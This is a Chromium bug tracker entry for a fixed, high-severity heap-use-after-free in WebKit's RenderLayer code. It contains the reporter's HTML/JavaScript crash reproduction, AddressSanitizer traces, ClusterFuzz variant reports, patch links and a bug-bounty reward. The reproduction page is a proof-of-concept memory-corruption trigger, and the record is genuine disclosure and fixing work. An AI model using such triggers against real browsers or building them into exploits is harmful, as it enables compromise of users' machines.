New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Mar 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::RenderLayer::addChild
Reported by miau...@gmail.com, Mar 11 2012 Back to list

VULNERABILITY DETAILS
bug

VERSION
Chrome Version: all
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el1:nth-last-child(2) {
        -webkit-box-reflect: left;
        display: run-in;
      }
      #el2 {
        height: 1px;
      }
      #el2:last-child {
        -webkit-box-reflect: left;
      }
    </style>
    <script>
      onload = function() {
        el1=document.createElement('q')
        document.body.appendChild(el1)
        el1.setAttribute('id','el1')
        el1.appendChild(document.createElement('input'))
        el2=document.createElement('div')
        document.body.appendChild(el2)
        el2.setAttribute('id','el2')
        document.body.appendChild(document.createElement('img'))
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('FormatBlock', false, '<pre>')
      }
    </script>
  </head>
  <body>
  </body>
</html>
and other variants

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer
Crash State: 

==2408== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffecd2fcb0 at pc 0x55555a996d1b bp 0x7fffffff5860 sp 0x7fffffff5858
WRITE of size 8 at 0x7fffecd2fcb0 thread T0
    #0 0x55555a996d1b in WebCore::RenderLayer::removeChild(WebCore::RenderLayer*) ???:0
    #1 0x55555aa3ccf6 in WebCore::RenderObjectChildList::removeChildNode(WebCore::RenderObject*, WebCore::RenderObject*, bool) ???:0

0x7fffecd2fcb0 is located 48 bytes inside of 296-byte region [0x7fffecd2fc80,0x7fffecd2fda8)
freed by thread T0 here:
    #0 0x55555cf02b62 in free ??:0
    #1 0x55555a91328d in WebCore::RenderBoxModelObject::destroyLayer() ???:0
    #2 0x55555aa3712c in WebCore::RenderObject::willBeDestroyed() ???:0


and others..



 
Couldn't reproduce any of these on Chrome LKGR Trunk r126086 ? Did you test with latest trunk ?
Do these testcase needs a page reload ? that might be reason it is not reproducing on ClusterFuzz ?
Labels: -Restrict-View-SecurityTeam -Pri-0 -Area-Undefined Restrict-View-SecurityNotify Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Merge-Approved SecSeverity-High
Status: FixUnreleased
Ok, it crashes stable and beta, but no longer affects trunk. We need to figure out what fixed it. 

Miaubiz, what was the webkit revision you could reproduce this on ? Are you still able to reproduce any variant or any of these testcases on trunk ?
@miaubiz: although it's fixed, we would consider rewarding for reports like this because the information is very useful: we can use it to merge the fix back to Chrome 18. Now, if only we knew which change took care of this :)
Comment 5 Deleted
Can we get a pic of the famous miaubiz cluster one day?
Comment 7 Deleted
Comment 8 by miau...@gmail.com, Mar 15 2012
I am on 
Chromium	19.0.1070.0 (Developer Build 126778)
OS	Linux
WebKit	536.3 (@110733)
Labels: -Restrict-View-SecurityNotify -SecImpacts-Stable -SecImpacts-Beta -Mstone-18 -Merge-Approved Restrict-View-SecurityTeam
Status: Available
Ok one of those repros is reproing on trunk ! Report coming soon. https://cluster-fuzz.appspot.com/testcase?key=26582417
Summary: Heap-use-after-free in WebCore::RenderLayer::repaintBlockSelectionGaps (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26579976

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f4b0678d8d0
Crash State:
  - crash stack -
  WebCore::RenderLayer::repaintBlockSelectionGaps
  WebCore::RenderLayer::repaintBlockSelectionGaps
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.95 Kb): https://cluster-fuzz.appspot.com/download/AMIfv942iqbUwKZ-kPNhemGz_LOxGNsnP4AxjxINloO5p_iyH0TOtIvznu_oXNHOkwcc_AC03tDFxHAr5dYFcKpfjzeB5D_ZIpv0SQEXL_ng0QBh2dCW0rt7YDBamp97o1Y5F2dsW_fZZoJsHmM2_Lb-K8_Zbgpa7A
Labels: Mstone-18 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
Summary: Heap-use-after-free in WebCore::RenderLayer::removeChild (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26583069

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f4f264a92c0
Crash State:
  - crash stack -
  WebCore::RenderLayer::removeChild
  WebCore::RenderObjectChildList::removeChildNode
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.91 Kb): https://cluster-fuzz.appspot.com/download/AMIfv94ZqLaIZV8-wtgr2toobHcO24sH82w8htykqfpkvpXGKwCUUvadjZyJcG9AU5O3aV0qB9WVnn0fLbCiy1CR8WVECBzHMXgAvnqipPq4qB6NyjJTyUSRqxXDvMVDJkAfr-0j7pSykXrqkta6W95QNd4w4hXaFA
Summary: Heap-use-after-free in WebCore::RenderLayer::repaintIncludingDescendants (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26583068

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f0a335760b0
Crash State:
  - crash stack -
  WebCore::RenderLayer::repaintIncludingDescendants
  WebCore::RenderLayer::repaintIncludingDescendants
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.86 Kb): https://cluster-fuzz.appspot.com/download/AMIfv95fxHfiUfmXFYUKQbGZsp8FjOZYjWp0V9MWSwvkVgAoyD7YZagzuFeYsFdv0lEet2uZ8Y8o4lLFJdASvVW2tVKyyv74Nm-ZREAlux2HzR5-EmLkE3qoHiqtk4TWZrX6isZZxX4wrBlAjcKJfDLx8GOrMW0Ptw
Summary: Heap-use-after-free in WebCore::RenderLayer::addChild (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26582417

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7fcc0af5c4c8
Crash State:
  - crash stack -
  WebCore::RenderLayer::addChild
  WebCore::RenderObject::addLayers
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.94 Kb): https://cluster-fuzz.appspot.com/download/AMIfv97EmRdiVVBGBGyUlOtjJ5YrLAwzXA0zeFme__79Rfvjf-IrNTU9_qxmMS4MaLhJfLhDvIKAPuuD8YLJApscMKcJXE93U0HEwZGXmoVHEbzZq8KToAcjD8hpcJ3IXVdl43bBOg1Uqy7OO1xYN4hEKconn-Gq8A
Owner: infe...@chromium.org
Status: Started
Patch uploaded upstream - https://bugs.webkit.org/show_bug.cgi?id=81265
Labels: reward-topanel
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/111263
Labels: -Merge-Approved Merge-Merged
M18: http://trac.webkit.org/changeset/112465
Labels: -reward-topanel reward-1000 CVE-2011-3068 reward-unpaid
$1000 and thanks :)
Labels: -reward-unpaid
Comment 21 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 22 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 23 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -Mstone-18 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer Cr-Content Security-Impact-Stable Security-Impact-Beta M-18 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 24 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 25 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 28 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 30 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 31 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 32 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 33 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 34 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment